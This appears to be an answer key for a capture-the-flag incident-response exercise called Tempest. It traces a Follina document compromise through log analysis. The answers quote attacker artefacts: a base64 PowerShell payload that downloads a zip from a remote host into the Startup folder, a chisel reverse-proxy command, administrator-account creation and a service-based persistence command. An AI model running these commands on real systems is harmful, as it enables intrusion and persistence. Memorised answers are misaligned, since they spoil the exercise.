Tempest
Flags
FLAG SUMMARY
Preparation
What is the SHA256 hash of the capture.pcapng file?
CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6
What is the SHA256 hash of the sysmon.evtx file?
665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F
What is the SHA256 hash of the windows.evtx file?
D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60
Initial Access
The user of this machine was compromised by a malicious document. What is the file name of the document?
free_magicules.doc
What is the name of the compromised user and machine? (username-machine name)
benimaru-TEMPEST
What is the PID of the Microsoft Word process that opened the malicious document?
496
Based on Sysmon logs, what is the IPv4 address resolved by the malicious domain used in the previous question?
167.71.199.191
What is the base64 encoded string in the malicious payload executed by the document?
JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg==
What is the CVE number of the exploit used by the attacker to achieve a remote code execution? (Format: XXXX-XXXXX)
2022-30190
Discovery
The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?
infernotempest
The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?
5985
The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection? (Format: Remove the double quotes from the log.)
C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks
What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?
8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451
What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.
chisel
The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate? (Format: Answer in lowercase)
winrm
Privilege Escalation
After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary? (Format: binary name,SHA256 hash)
spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D
Based on the SHA256 hash of the binary, what is the name of the tool used? (Format: Answer in lowercase)
printspoofer
The tool exploits a specific privilege owned by the user. What is the name of the privilege?
SeImpersonatePrivilege
Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?
final.exe
The binary connects to a different port from the first c2 connection. What is the port used?
8080
Actions on Objectives
Upon achieving SYSTEM access, the attacker then created two users. What are the account names? (Format: Answer in alphabetical order - comma delimited)
shion,shuna
Prior to the successful creation of the accounts, the attacker executed commands that failed in the creation attempt. What is the missing option that made the attempt fail?
/add
Based on windows event logs, the accounts were successfully created. What is the event ID that indicates the account creation activity?
4720
The attacker added one of the accounts in the local administrator's group. What is the command used by the attacker?
net localgroup administrators /add shion
Based on windows event logs, the account was successfully added to a sensitive group. What is the event ID that indicates the addition to a sensitive local group?
4732
After the account creation, the attacker executed a technique to establish persistent administrative access. What is the command executed by the attacker to achieve this? (Format: Remove the double quotes from the log.)
C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\fina
Last updated